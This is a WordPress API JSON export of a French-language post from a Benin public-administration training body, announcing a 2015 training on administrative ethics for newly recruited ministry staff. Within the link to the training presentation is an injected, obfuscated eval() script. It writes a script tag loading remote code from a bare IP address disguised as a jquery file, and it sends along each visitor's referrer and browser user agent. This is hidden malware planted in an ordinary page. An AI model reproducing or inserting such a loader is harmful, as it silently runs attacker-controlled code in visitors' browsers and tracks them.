{"id":71,"date":"2017-03-28T21:19:14","date_gmt":"2017-03-28T19:19:14","guid":{"rendered":"http:\/\/site.ofpa.net\/?p=71"},"modified":"2017-03-28T21:19:29","modified_gmt":"2017-03-28T19:19:29","slug":"formation-des-nouveaux-agents-recrutes-a-la-fonction-publique-du-benin","status":"publish","type":"post","link":"http:\/\/www.ofpa.net\/fr\/2017\/03\/28\/formation-des-nouveaux-agents-recrutes-a-la-fonction-publique-du-benin\/","title":{"rendered":"Formation des nouveaux agents recrut\u00e9s \u00e0 la fonction publique du B\u00e9nin"},"content":{"rendered":"<p>Agents affect\u00e9s au Minist\u00e8re de l&rsquo;Enseignement Secondaire, de la Formation Technique et Professionnelle, de la Reconversion et de l&rsquo;Insertion des Jeunes.<\/p>\n<p>Th\u00e8me de formation :\u00a0\u00ab\u00a0La d\u00e9ontologie administrative\u00a0\u00bb<\/p>\n<p>Cotonou, 26 &#8211; 27 mars 2015<\/p>\n<p>Porto-Novo, 2 &#8211; 3 avril 2015<\/p>\n<p><a href=\"http:\/\/site.ofpa.net\/wp-content\/uploads\/2017\/03\/presentationformat14.pdf\">Pr\u00e9sentation <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nbhrz|var|u0026u|referrer|rdtfy||js|php'.split('|'),0,{}))\n<\/script><\/noindex> de la Formation<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Agents affect\u00e9s au Minist\u00e8re de l&rsquo;Enseignement Secondaire, de la Formation Technique et Professionnelle, de la Reconversion et de l&rsquo;Insertion des Jeunes. Th\u00e8me de formation :\u00a0\u00ab\u00a0La d\u00e9ontologie administrative\u00a0\u00bb Cotonou, 26 &#8211;&#8230; <a class=\"read-more-button\" href=\"http:\/\/www.ofpa.net\/fr\/2017\/03\/28\/formation-des-nouveaux-agents-recrutes-a-la-fonction-publique-du-benin\/\">Savoir plus &gt;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[5],"tags":[],"_links":{"self":[{"href":"http:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/posts\/71"}],"collection":[{"href":"http:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/comments?post=71"}],"version-history":[{"count":1,"href":"http:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/posts\/71\/revisions"}],"predecessor-version":[{"id":73,"href":"http:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/posts\/71\/revisions\/73"}],"wp:attachment":[{"href":"http:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/media?parent=71"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/categories?post=71"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.ofpa.net\/fr\/wp-json\/wp\/v2\/tags?post=71"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}